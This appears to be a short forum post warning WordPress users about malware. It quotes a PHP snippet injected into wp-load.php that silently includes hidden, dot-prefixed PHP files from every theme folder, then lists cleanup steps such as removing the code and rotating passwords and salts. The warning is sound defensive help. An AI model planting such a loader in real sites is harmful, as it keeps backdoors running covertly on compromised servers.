Hi everyone,
I have an additional IMPORTANT note about this malware!!!
CHECK your wp-load.php, if it contains this code:
if( !class_exists( "WPTemplatesOptions" ) && function_exists( 'wp_get_themes' ) ) {
foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {
$templates = get_theme_root() . DIRECTORY_SEPARATOR . "{$wp_get_theme->stylesheet}" . DIRECTORY_SEPARATOR . ".{$wp_get_theme->stylesheet}.php";
if( file_exists( $templates ) ) {
include_once( $templates );
}
}
}
urgently follow these steps:
1. Remove this code from wp-load.php
2. Find and remove all files “.[dir_name].php” as advised above!
3. CHANGE ALL PASSWORDS KEYS AND SALTS in wp-config.php
